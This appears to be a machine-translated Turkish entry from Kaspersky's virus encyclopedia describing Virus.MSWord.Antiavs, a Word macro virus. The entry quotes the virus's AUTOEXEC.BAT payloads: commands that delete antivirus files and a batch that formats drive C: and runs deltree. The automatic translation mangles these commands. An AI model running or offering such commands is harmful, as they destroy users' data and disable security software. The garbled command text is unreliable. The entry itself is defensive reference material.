BU SERVİS, GOOGLE TARAFINDAN SAĞLANAN ÇEVİRİLER İÇEREBİLİR. GOOGLE, HERHANGİ BİR GARANTİ, GÜVENİLİRLİK VE TİCARİ ELVERİŞLİLİK, BELİRLİ BİR AMACA UYGUNLUK VE İHLAL ETMEME GARANTİLERİ DAHİL OLMAK ÜZERE AÇIK VEYA ZIMNİ GARANTİLER DE DAHİL OLMAK ÜZERE, AÇIK VEYA ZIMNİ TÜM GARANTİLERİ REDDEDER.

Kaspersky Lab web sitesi, Google Çeviri tarafından desteklenen çeviri yazılımı kullanılarak size kolaylık sağlamak amacıyla tercüme edilmiştir. Doğru bir çeviri sağlamak için makul çabalar sarf edilmiştir, ancak otomatik çeviri mükemmel değildir ve insan çevirmenlerinin yerini alması amaçlanmamıştır. Çeviriler, Kaspersky Lab web sitesinin kullanıcılarına bir hizmet olarak sunulur ve "olduğu gibi" sağlanır. İngilizce'den başka bir dile çevrilmiş herhangi bir çevirinin doğruluğu, güvenilirliği veya doğruluğu konusunda açık ya da zımni hiçbir garanti verilmemektedir. Çeviri yazılımı sınırlamaları nedeniyle bazı içerikler (görüntüler, videolar, Flash vb. Gibi) doğru bir şekilde çevrilemeyebilir.

Virus.MSWord.Antiavs

Sınıf Virus
Platform MSWord
Açıklama

Teknik detaylar

Bu şifreli bir Çince Word makro virüsüdür. Dokuz makro içerir: AutoExec, AAV, AutoOpen, AutoNew, FileSaveAs, ZlockMacro, FileTemplates, ToolsMacro, Organizer.

Virüs, virüslü bir belgeyi (AutoOpen) açarken global makrolara neden olur ve kendisini yeni bir adla (FileSaveAs) kaydedilen belgelere yazar.

Dosya / Şablon menüsüne (FileTemplate) girildiğinde virüs, geçerli belge için "AntiAVs" parolasını ayarlar ve MessageBox'u görüntüler:


WordBasic Err = 16
Yeterli hafıza yok!
Araçlar / Makro menüsüne (ToolsMacro) girildiğinde, virüs geçerli belgenin içindeki tüm metinleri siler ve anti-virüs PC-CILLIN dosyalarını silen komutları AUTOEXEC.BAT dosyasına ekler:

Eko kapalı
attrib -h -r -s + ac: pc-cil ~ 1 *. *> nul
del c: pc-cil ~ 1 * .dll> nul
Virüs daha sonra anti-virüs dosyalarını siler:

C: PC-Cillin 95Lpt $ vpn. *
C: PC-Cillin 97Lpt $ vpn. *
C: TscPC-Cillin 97Lpt $ vpn. *
C: ZlockavGsav.cas
C: VB7Virus.txt
C: Program FilesNorton AntiVirusViruscan.dat
C: Program FilesSymantecSymevnt.386
C: Program FilesMcAfeeVirusScan95Scan.dat
C: Program FilesMcAfeeVirusScan95Mcscan32.dll
C: Program FilesMcAfeeVirusScanScan.dat
C: Program FilesMcAfeeVirusScanMcscan32.dll
C: Program FilesCommand YazılımıF-PROT95Sign.def
C: Program FilesCommand YazılımıF-PROT95Dvp.vxd
C: Program FilesAntiViral Toolkit ProAvp32.exe
C: Program FilesAntiViral Toolkit Pro * .avc
C: Tbavw95Tbavw95.vxd
Sisteme rastgele sayıcıya bağlı olarak virüs, metni AUTOEXEC.BAT dosyasına yazar:

@Eko kapalı
cls
echo Büyük bir virüsü temizliyorum:
echo MS-WINDOWS
echo sizin için. ^ _ ^
echo –AntiAVs–
echo y | biçim c: / u / v: AAV> nul
deltree / yc:> nul


Orijinaline link